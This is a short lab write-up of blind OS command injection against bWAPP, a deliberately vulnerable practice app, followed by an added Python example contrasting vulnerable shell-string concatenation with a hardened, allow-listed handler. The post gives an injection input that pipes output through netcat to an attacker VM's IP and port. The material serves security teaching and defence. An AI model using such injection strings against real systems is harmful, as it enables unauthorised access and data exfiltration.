OS Command Injection on bWAPP
In this post, I will be exploiting the OS Command Injection — Blind section on the Buggy Web Application. This instance of bWAPP was hosted in a Docker container on an Ubuntu VM and will be exploited from a different Kali Linux VM. This aspect of bWAPP will be exploited on the low setting.
Upon selecting the OS Command Injection — Blind setting, this is what the user will see.
As shown on the image above, this page contains a single text box which will be used for the exploitation. Entering an IP address and hitting the ping button will result in the following.
To exploit this, I will use a command injection to establish a remote connection with the attacker VM. To begin, I will first use the netcat tool to listen on a port. In this case, I used port 4757.
Next, using a command injection, I will forward traffic from bWAPP to the command line where netcat is listening. This is all entered into the text box on bWAPP: the input is a localhost address piped to nc, followed by the IP address of the Kali VM and the port being listened on. The command entered is “127.0.0.1|nc 192.168.48.133 4757”.
Going back to the terminal, the result shows that traffic is in fact being sent to the attacker VM, meaning that the text box has successfully been exploited.
In conclusion, I was able to successfully exploit the text box using a command injection on the OS Command Injection-Blind page of bWAPP.
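The post does not show the server-side code behind the text box, so the following is an added example, not code from the original post or from bWAPP (which is a PHP application). It is a Python sketch of why the input above works against a handler that concatenates user input into a shell string, and of a hardened handler that rejects it. The function names and the `ping -c 1` command line are assumptions.

```python
import ipaddress
import subprocess

# Constructed inputs: a normal address and the string quoted in the post.
BENIGN = "127.0.0.1"
PAYLOAD = "127.0.0.1|nc 192.168.48.133 4757"


def vulnerable_command(target: str) -> str:
    """The 'before' pattern: user input concatenated into a shell string.

    Returned for inspection only; this example never executes it.
    A shell parsing this string treats '|' as a pipe and starts a second program.
    """
    return "ping -c 1 " + target


def safe_ping_argv(target: str) -> list:
    """Hardened pattern: accept only a literal IPv4 address, build an argv list.

    Anything that is not a dotted-quad address (pipes, spaces, semicolons,
    hostnames) raises ValueError before a process is ever created.
    """
    try:
        addr = ipaddress.IPv4Address(target.strip())
    except ValueError:
        raise ValueError("rejected non-IP input: %r" % target) from None
    # The address is one argv element; no shell is involved to interpret it.
    return ["ping", "-c", "1", str(addr)]


def ping(target: str, timeout: float = 5.0) -> bool:
    """Run ping without a shell (shell=False is the subprocess default)."""
    result = subprocess.run(
        safe_ping_argv(target), capture_output=True, timeout=timeout, check=False
    )
    return result.returncode == 0


if __name__ == "__main__":
    print("shell string (vulnerable):", vulnerable_command(PAYLOAD))
    print("argv (hardened, benign):  ", safe_ping_argv(BENIGN))
    try:
        safe_ping_argv(PAYLOAD)
    except ValueError as exc:
        print("hardened handler:", exc)
```

Allow-list validation and avoiding the shell are independent layers: either one alone stops the input shown in the post, and using both covers mistakes in the other.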